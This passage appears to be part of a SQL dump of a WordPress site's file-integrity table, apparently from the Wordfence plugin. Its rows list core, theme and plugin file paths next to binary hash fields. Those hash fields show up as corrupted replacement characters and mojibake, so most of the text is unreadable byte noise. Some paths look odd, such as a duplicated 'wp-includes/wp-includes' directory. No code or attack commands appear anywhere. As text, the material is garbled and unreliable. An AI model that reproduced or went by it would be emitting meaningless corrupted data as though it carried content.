��UH\Z��x�P��Ā��<��;X�','',0,'?'),('��^%}�R 4�!uQ','wp-content/themes/vision-lite/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��\0�\r*Y��`>��','�Η�˜�>Ҁw��H�x���X��.]�w�1','',0,'?'),('�n�&F$�\rġV����','wp-content/themes/hueman/assets/front/css/main-not-responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qd�步!�b4�0','p���®�c��d��b���8�\rV�KQ!K','',0,'?'),('�=�}C���i��HT','wp-admin/network/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�3���@%�c ','�\\H�.7���7QtUw�ݰAK,�$A��!��Lz','',0,'?'),('��g+������,c�','wp-includes/block-supports/colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ef�1!9vC8�:(��\'','Uc�OТ��0;�[�z\'��أdP��+�j���0','',0,'?'),('��}�]y�Ĺ<1vp','wp-content/themes/wp-barrister/library/images/icon-fl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�)��*�e�\n�n','9wA��,� >`�n�\"X5Rn��{�>�X�Ey�S','',0,'?'),('�g��I�!٭���_�','wp-includes/ms-blogs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YYw_s簃@ DE�m','�~ۃG��,,?��0��v��f��UӧN��iK','',0,'?'),('���t�DX�m\0#�(�','wp-includes/customize/class-wp-customize-nav-menu-locations-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��]σ��2+fX','Ѵg�h��m�s�ꄑ��-vmQ�Ij�\Z]sQT9�m','',0,'?'),('��]/~���q��XŎE','wp-includes/js/jquery/ui/button.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�qz�uo�>���','8�v�J.�OA�z��A)�HJe�f�B�,��z','',0,'?'),('���L?\n�\n���x��@','wp-content/plugins/wp-cerber/assets/flags/al.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#����S�{r<�','����G�U0<>�.]fX�[I���\0����7','',0,'?'),('�6���Ab���k�','wp-includes/wp-includes/class-wp-editor.php',0,'�s��\'+���������L','�s��\'+���������L','/%�k�\r<���&u�NKI�v���GrA��','',0,'?'),('�3�������J�','wp-includes/wp-includes/ms-blogs.php',0,'YYw_s簃@ DE�m','YYw_s簃@ DE�m','�~ۃG��,,?��0��v��f��UӧN��iK','',0,'?'),('\0HS�\r�Ѐ1X�@','wp-includes/wp-includes/css/dist/block-directory/style.min.css',0,'IF �1�P�������','IF �1�P�������','��hbAnIJ��\'��o�;~p%�Z$.\'����-4','',0,'?'),('\n���{�;@ m�=}','wp-includes/wp-includes/images/rss.png',0,'��[�(�.��*NZ�','��[�(�.��*NZ�','j�(-9��_��E-#�we�$�]o�01��u','',0,'?'),('��eJ�\'U9�5�x','wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php',0,'�V�*��F谯��<��l','�V�*��F谯��<��l','�®�R�l�U�����wz�ank��G�t�3�','',0,'?'),('��L7��v�q���','wp-content/themes/sg-window/sidebar-1-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�~�բvj�;�','\0��&X������L��r͓j.��}Y�b�\0)��','',0,'?'),('4\nEԺ��eH0t�','wp-content/themes/capacious/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���E�d�GR��-A�','�@2A�L����-��ŢO�\n�\"�U� ��)N�','',0,'?'),('@O\'m����Ė(o1�o','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_column.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Gu���\'����v�','���9��P~���\"gE\0����9#eu��葧��','',0,'?'),('B�@�R*G�xF4N}','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�_�?Sş\Z]�y�','�6��[-�,9YR�r�\rY\"-��an�6$�','',0,'?'),('G���$�7O�9','wp-content/themes/sg-window/img/icons/small/myspace.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"b;DÁ�4���p\n�','[��/��aOt�\r<ӤQrg����a���','',0,'?'),('P�*�^��ՑR̹k','wp-content/themes/Yegor/FT/plugin/updater.php',0,'uc3\\����[\'�N�9�','uc3\\����[\'�N�9�','Q�s�=\\Eؐ�@���\0EF�r�^Do���\\','',0,'?'),('R�\\�&��T �|`','wp-includes/class-wp-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��b�Zd�� ��','���mA�QW,�?�;��w�FT\\>��','',0,'?'),('ynm�;�/�UsK ��','wp-includes/css/wp-embed-template-ie.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7{WP�L�{H���I�','\\aWq1��+��Я�o�L�Y\0�K���%<','',0,'?'),('|�&;�r�Ls5��','wp-admin/includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I|��lu�D�','�� \r���B�%�F�V}[�j�7CF�A�','',0,'?'),('���Ye�.�0s��','wp-admin/includes/class-wp-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�Kt�Jr�\"�-*�','7�d�i}k�4��+)�[��-L�4�uR_O�<Ѩ�','',0,'?'),('�A�o\r�ZԔ_�t','wp-content/plugins/wordfence/views/waf/waf-uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~�xT-4�ZK��3','�>|k��\\~/n8� 9��i�+vT��[s','',0,'?'),('��i���65�\\��','wp-content/themes/spidermag/spidermag/hooks/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gl�7��Gu�+;ȸ','CM�^�ʄ�m�:�7�tٙ�Y/�W@���,H�','',0,'?'),('��`��Em�es�@��','wp-includes/wp-includes/blocks/archives.php',0,'�{��\nP?^��u:� ','�{��\nP?^��u:� ','TU��r�-{��O9�P�P[�s��\0�P�t�9P','',0,'?'),('����+*��5���\'�','wp-content/themes/sg-window/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z��.5JZ�<��{','�IO.�J����o�ޞ&���5�AO�Uq4�','',0,'?'),('��x���;C�QkkR�','wp-includes/wp-includes/class-wp-dependency.php',0,'���NV}��b.\'�5m','���NV}��b.\'�5m','�[�4M�,�4�ܓ�x�wBB̕=Bg��}I�l�','',0,'?'),('��\'-�p�-��f�','wp-admin/css/l10n-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xmǏ|�s���A�',']��%FL�\nI�L��l���f426G��\'��','',0,'?'),('��j�ֹJ����0Y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�0W\"F)����8O�','�5���)&��BoK]���ػ��rm`%��h�O','',0,'?'),('�Q%rT>�!�e_zE��','wp-content/themes/twentytwentyone/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��Տ,;�\"��]&�','\'�ߍ���\0�`q���ֶp�~�r�I�{��','',0,'?'),('�#�jE�C�\n���R��','wp-content/themes/Kent/js/superfish.js',0,'��\\𦧋u�cw>L','��\\𦧋u�cw>L','�h�pk�t{o��J�:o���� J�(��*�LS','',0,'?'),('ܑ«_:o�T~@)>M','wp-content/themes/hueman/assets/global/oldBrowserCompat.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�4\ZzƉ�: �/�]k','[���u+߭gݠ�=�����{h旑R','',0,'?'),('�\"�< i�t��&�','wp-admin/css/colors/modern/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�̯��R�j�F�','24�ރ�ki<��u&�*��7�U�s��=~��F�','',0,'?'),('��PC���I徥��','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php',0,'����v�\rs*�\\�','����v�\rs*�\\�','��O�Z=�<�3S�t�Q����_�u;� m8','',0,'?'),('��L�KP�1�0L�\\','wp-content/themes/hueman/assets/front/img/demo/12-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')\0�WHQ� u^�w�9j','���k�m\"��O#�h����V���t<�H�L%','',0,'?'),('%�cQ�O�M����','wp-includes/wp-includes/block-patterns/two-images.php',0,'&��_�w?V�:�g��C','&��_�w?V�:�g��C','w@�c|�h�(��Hz�X[�_�:�x��0�)K','',0,'?'),('*ԅt��hEc�W�h^','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/H.php',0,'�ăd��O�[�S\nc\0','�ăd��O�[�S\nc\0','^o�&[�l����2Zg/�?>��P~C��Iȗ','',0,'?'),('9�k�ɽ �JZ��<','wp-content/themes/twentytwenty/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�G�I\"�+����','�����C��eĻ�3�q�9qR�0�a�J�','',0,'?'),('L��bP�-I1f�','wp-includes/theme-compat/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��<w�!��1','q�2�յ��Ϣ>r�7Nj�� D�^��A5\r','',0,'?'),('N�d#R��+��r\0s[','wp-content/plugins/wordfence/views/reports/activity-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?ue�wD�:��E�','��ζ�\Z��)v���vG��,�h�/�ӈ�','',0,'?'),('t������!�\Z�%\n','wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('{�~��rb�\\B��%�','wp-content/plugins/wordfence/css/dt_table.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gJbj�J��9�k:�','o[P�HyЊ}���iGc�~��<c�D�R:D�','',0,'?'),('|�(�K��B(��5�','wp-content/themes/maxbusiness/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E{=C�4��q!\'��\\�>','�S�� �hj^0@.���\Z��2�j�4�S�2�/[','',0,'?'),('~�ڄ}������ҳ\'','wp-content/themes/advance/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1YWǒ��u�GO�\n','P�#c�qAR��9%S۵QL���}q<Sw�!E�','',0,'?'),('�L��\"�G�ʄ/\nN�','wp-admin/images/privacy.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ҟ�ݘ���ӽ�}�','qO.���x&��*p���@��l����Β/k','',0,'?'),('�{��Y�\\�z錿�}c','wp-includes/images/smilies/rolleyes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���O�2�Ofݣi�','fK�)�\n�d��!]\r)��\\}���זl�^��','',0,'?'),('��S��)�v�����','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js',0,'��e�-{\'B�����Qa','��e�-{\'B�����Qa','m\\��\0W/v�-O�R�w�mF���}o�P��D','',0,'?'),('��`���<k$�Z�','wp-content/themes/Yegor/ft-options.php',0,'\0T�Իe]�!����T','\0T�Իe]�!����T','0 ����;M��(O�km�nGb�Z��L~�\"S�','',0,'?'),('���-� ��\"\"F6','wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^<�|%z�A�M�U<�','���ҟ�q�v@, C�1�4�-����zd,�P�','',0,'?'),('�r(:7à��C�y7','wp-content/themes/pine/admin/img/left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���B�ٌh��VNEz','�\ZE)n��C����Z���P������L�','',0,'?'),('�?�\0��l����.�','wp-includes/class-wp-application-passwords.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�Q����cW�M7A','��x���� �?��L�\Z�l�C�\"���Ǵ��','',0,'?'),('�2p)��t��I��','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���\0�\">y>=����','xVQ/}�琾:(3&���%�U��Jo��C','',0,'?'),('���z�|%�\\k c�','wp-content/themes/Endolf/inc/ticker.php',0,'�{�!��} kc�ݘ�{g','�{�!��} kc�ݘ�{g','[�3j�[Y�2 7\\��f�(m�s�j{�u60�','',0,'?'),('�����o�Rb��','wp-includes/js/dist/url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ץ��Z�3��q��\")�','�iO�G��sՎ��,����`\\]���~5\\','',0,'?'),(' Łq\Z��{��>�d-','wp-content/plugins/wp-cerber/assets/flags/mt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z\n�r�CZ2���Y��','X�g�����a�-\0s!�\nZF�>X��\Z','',0,'?'),(' �es(N^���+q�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-phpunit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�MEƱ��(����(','E��a�\r�f U�DLb�V�ҪW#s�s��','',0,'?'),(' \'���_U;0�/<�','wp-admin/includes/class-bulk-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�:y�x1s)����','�Ϲ���ݶ1SXCTڼ�<�ڊh`���V','',0,'?'),(' *@ADғ�=pu���E','wp-admin/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W2# �3�','8庹���R0H����m�я�Ȯ�Я&m','',0,'?'),(' 1c0�x\n��q\n\Z�!iM','wp-includes/wp-includes/class-wp-oembed-controller.php',0,'\";�r��\Z(FAU','\";�r��\Z(FAU','�p���[����j$8�7�zI\\�!y�<G�4\r���','',0,'?'),(' 5��rD�g�籃�','wp-content/plugins/wordfence/views/dashboard/options-group-license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IT�愭��,�;_','��@��q��>G�C�|�U��sC��p���','',0,'?'),(' <@�s����\r��F��/','wp-includes/Requests/Exception/HTTP/305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��\0�K��/`�,��&','H�Ǝ����+@�I���b��^=�QvM6_iL','',0,'?'),(' <�v��VY���oX_','wp-content/themes/shopone/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�%��5�huj.J��','�ع��~P�^C�A{��� �\n�%6�����+@ ','',0,'?'),(' B�p�Q#_ij>bh','wp-includes/wp-includes/Requests/Exception/HTTP/407.php',0,'����v����j&�Ƶ','����v����j&�Ƶ','>\Z���]ƚ�B̏Xv�ذc����.N2�NҹЯ','',0,'?'),(' VX.�ټf%��O�}','wp-content/themes/spidermag/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�VFxTx�\0�$Y�}h�','���?��\'s hc�f�OZ���S�|l�3�R�\\','',0,'?'),(' V��K+�L\Z*!���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:jC�o\0\"��R�','*(��P�0eU�����!7p�Y�v��3','',0,'?'),(' W����\n\n+�Uae','wp-content/themes/storeone/js/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�D\r)��7c���O','�(��B5s�TP���<pt%�FI4�L�RZ_��Y','',0,'?'),(' |=��t�xMV�J�$','wp-content/themes/newsmag/assets/vendors/machothemes/components/styleselects.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AM��IJ�3u�n�P�','�s��}��SC�_����!��S��>X�','',0,'?'),(' �\n��3�3�)\'sS=�','wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��(J��D�T','G<��k<eL�Q|�#��Bޭ��+77��=т�','',0,'?'),(' �Gz2�Y2-���','wp-content/themes/auberge/template-parts/loop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��7��f�V�\"ʴf','oM�7�kP�O�o��x1�$�1?�\n�Ӊ�e��','',0,'?'),(' ���Fk��uR\\O_��','wp-content/themes/pine/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����7����a�t��','��r*\r�eW�N.��XA^��v\"���Y�\'','',0,'?'),(' ���=����g�V�|�','wp-content/themes/twentytwenty/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xM�ɞx���x�','���/�Ç�:�&�s�ۃu ���^&H','',0,'?'),(' �%dީ@i *�tS','wp-content/themes/showcase-lite/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�WH��ߥ�`��r��','@V��rf�����.��u��s�Q��\r��Ma��','',0,'?'),(' �G�ʴ��Gtؑ��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oū3�( ia�Y���(','����%��\Z0b��[u�#�v.�_�� O�=0','',0,'?'),(' �z�z{����L��H','wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�\"3R0������','��z�m1��xJ �g�Ь�xs�sIѻ˸�2','',0,'?'),(' �cNq̻�\\�ѭ�','wp-includes/wp-includes/css/buttons.css',0,'���[��\\���.�','���[��\\���.�','Lێ��b����3���y����~�>�I�t���','',0,'?'),(' ��NJi2�zl�L�(','wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php',0,'�l�{�bOs�_a��>','�l�{�bOs�_a��>','m�n5��ߐ֞βgJ�\\�����3�����','',0,'?'),(' �\r$ Q�^C(����','wp-includes/Requests/Exception/HTTP/505.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]A 3�[/Cd���','��⭛� i�{�PA�͆k���d���M\n���','',0,'?'),(' �A�1����uK���','wp-content/themes/auberge/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':5�.N�/1m�\r}�','-�j���\n���2�:�����0�W~�','',0,'?'),(' ��c̫)I�\np,͑��','wp-includes/css/jquery-ui-dialog-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xs!�����U,U���','�Y� 4�0���@��>Wb�5!4����','',0,'?'),(' ��p��E�4q�&?J�','wp-content/plugins/wp-cerber/assets/flags/im.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),(' ������ f���O','wp-includes/wp-includes/css/wp-pointer-rtl.min.css',0,'���k�d�\\n�Ue�S@','���k�d�\\n�Ue�S@','������7�Z%\0L�|��I�`��?{hl�G�\\','',0,'?'),(' ���F>����e$+�','wp-includes/wp-includes/js/clipboard.js',0,'Ԓs� 5C�ɚ�b��LF','Ԓs� 5C�ɚ�b��LF','���ʿ�Iv�+>Y�h�b�F\\x��v�.wT','',0,'?'),('!o�\r��A��v7��e','wp-admin/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t&���V�݁6�ָ','mcT)��Ҝ�O>y�n/@i\"+�5dJ��@���','',0,'?'),('!!�I�:�B�ߞ�-','wp-content/themes/hueman/functions/czr/controls/class-modules-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����p��$wA/ҟ#*�','Ri10;�|�AG�E�\'���\0�kn �$x,at�','',0,'?'),('!1b݅9��*�\\��','wp-admin/admin-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R��#�ttIrzX�K','Vo�梌>�)�x����Z���EB�O��','',0,'?'),('!4xH����Jo','wp-content/themes/promote/inc/kirki/assets/scss/sections/expanded.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ڝ�3�@��X',')��k�/>-ԕ�ܳkR#�H@�-�<���','',0,'?'),('!Dxɐ�г��[t�Q�','wp-includes/wp-includes/js/tinymce/plugins/link/plugin.min.js',0,'��V\\\n]��K�s\'�','��V\\\n]��K�s\'�','\Z�>��I�S�е�����v�,��q�U����^','',0,'?'),('!I�d]5$���[��~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��L�� k\'k1��','��1�\\�Qt�*���J���%���s��&','',0,'?'),('!Plu6�������CZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P���e��1','T���*��+���z]ʜ;>�\n�3���]?x�','',0,'?'),('!_��輵p3p�n��L','wp-includes/images/smilies/icon_eek.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/I ���x�)�(\"��','�8�����K҇���4������!��:ʰ','',0,'?'),('!z?�w8�^�ș�','wp-content/themes/advance/inc/kirki/assets/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!G�r�v[�Z�l )�','s��@��#�h�rER0}�� A�1#Z��K�','',0,'?'),('!|(�y�W�*1Oo2Cu','wp-includes/js/wp-api.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�BY�f��b�b2�lз','�N�_���R\"T������%i�c��ő� 2&�H','',0,'?'),('!�UE�����Ο�VϋQ','wp-content/themes/gambit/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�li|݄��Qh��I','�3�P�C�����3f����|�t!/��ܢ','',0,'?'),('!��xx�+!���[�(','wp-includes/js/dist/list-reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��(j\nX��f�[�9','�{[m�؎�~��6��\n���?�¬QnM6�','',0,'?'),('!����W٤�\"��@�','wp-content/themes/sg-window/img/icons/linkedin.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�W��bl���G\\2','�@F\"4%�I����g�숦g0������l','',0,'?'),('!��d�p\nH�]�G-��k','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/video.png',0,'�¶��B�=\rz��3j�','�¶��B�=\rz��3j�','���i���I/=�M�MX�:M�A�pv�\r�','',0,'?'),('!�w<���A\n�@�O','wp-includes/js/dist/hooks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P��$?wZ˧�','¬Y�1�Ys�_q�,����\\��m�Ox�Fc��','',0,'?'),('!��y��\'U��b��#}','wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zY��衆:��Lk','3`R<��!���0)B��W�gH�Z��','',0,'?'),('!�zϞ+�2_B�{:D�','wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-media-uploader.php',0,' 3r7z��Vy�g �X��',' 3r7z��Vy�g �X��','Nٝ�cǐ�%�QQ�^�p���h�j:r���ӯ','',0,'?'),('!�##sw:\rH*�$q�','wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�u$�j�6�uwq�t�','�r\"��(�-w�a$A�2\"�7��\\��Vb�','',0,'?'),('!��2�_xON�+hTTH�','wp-content/themes/event/inc/upgrade-plus/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�ܑ*��\Zox�QaN&','�|8���8?�\\-����\Z`�����7�Y��','',0,'?'),('!�����%H�*�<5�','wp-includes/wp-includes/block-supports/typography.php',0,'�w��veY�\Z��f�','�w��veY�\Z��f�','�B��tٯ�@�^���5��N���XȆ<','',0,'?'),('!��⋶��Z]��n-','wp-includes/block-patterns/quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�:�v,^8^����\"�}','����@��]y�%U?�vw�Xl�^�{q�','',0,'?'),('!��\')�qM*�Xc','wp-includes/blocks/embed/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B���S�):\\l�ID�','��$Xn�{4��aV_`�M,sbݱ�\"�*3��','',0,'?'),('!�R���p�nL�w�m7','wp-includes/js/tinymce/plugins/lists/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�r?�N�ぼI��q\'�','%�=r������d��v\n��i�z�x�u��)3p','',0,'?'),('!�\\Ϩ��\'� �jn�','wp-includes/wp-includes/css/admin-bar-rtl.min.css',0,'�4�܀ ���,玒�[�','�4�܀ ���,玒�[�','F��L5�%��$�e��&q�(����W-n)�m\'','',0,'?'),('!ہ�Iǵ�`��8�t','wp-includes/js/dist/keyboard-shortcuts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��Њ�-����^�','���-��z��~�������H��$�L','',0,'?'),('!߬�vg1�IV|�E�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[<��ԉ1��-�3��','�wB��;\\q\\�8�N�!��-�X����!��\n','',0,'?'),('!�ŏ��\n�@�k�z.;','wp-content/themes/skt-pathway/no-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c���#b��|����Kc',' {gӊGi��X�6d���������A:�','',0,'?'),('!�q��1�� cQƲ','wp-content/themes/hueman/option-tree/ot-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V��T_�{Y�N','�?W&/���rcM�;�ڞ���a������','',0,'?'),('!�Tۦ���� l�I�\n','wp-content/plugins/wordfence/lib/menu_tools_importExport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�E��jk��Z:q�','�z�+e<OkM�Δ��t��� ��q��hW�','',0,'?'),('!�>лӊ^��[��U}�','wp-includes/js/dist/data-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>\"�.\"�A�9�','�ڌ�R��md8@�ig�R���?���?�1�0','',0,'?'),('!�O�4�bCRR�fO�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R����͡�RI0��[','�Ӆ�_3�:��þAs�N���0*Y�g�5�','',0,'?'),('!��Y0-z1�dm>�','wp-admin/js/plugin-install.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�a6���:)�\n','A`�� �w���D�ܞ�n-����SU7�\Zm','',0,'?'),('\"Et�y�s����\Z|g','wp-includes/js/tinymce/plugins/wptextpattern/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E ��-N�o����','�L�I�Y�ow�)�4!:�;?��','',0,'?'),('\"�x����\'a��','wp-content/themes/kidzoo-lite/sass/base/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N[F�GTlP8������','��\"��������h�+�ÚgH�p��8��#��','',0,'?'),('\"$�3�\r�ޖ�Ζ|��/','wp-content/themes/advance/inc/kirki/includes/styles/class-kirki-styles-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�]F�ș�ێ����','��J�3l`��y���\Z��ր��\0�=$`(!���}','',0,'?'),('\"(}G��r� 0��V(','wp-admin/ms-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~<�b�s�\'�+�\Z�Q','q�J��R�_+�V�C%�~d���35k��x��','',0,'?'),('\"-�Ѳ\n2�j%�(o','wp-content/themes/twentynineteen/sass/layout/_layout.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�&�\"��{����#*�','���v���@.|���s>0�O���A3jA���','',0,'?'),('\"0�rN1M���#���','wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('\"2y�hr�:�]f�_�','wp-content/themes/skt-pathway/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��a8���_C\\\0�I�','�\'�\\�o4���o�|4I,@ J�O����Ћ�','',0,'?'),('\"4\\5����bL���','wp-content/themes/auberge/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�\nK(��a�Q','�݄����q�&yn��Dу�`~�n�y��ڤ�','',0,'?'),('\"8A\n=��ᇼfp5','wp-includes/theme-compat/embed-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�[R+S��A-\Za*e','�}�pN�\0�K��6�%),�o��`�)�1\08','',0,'?'),('\"IFn����@�a�}�9','wp-admin/includes/class-wp-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6����n+66��n���','\\AY�Q�ۂ�|�?�X�� 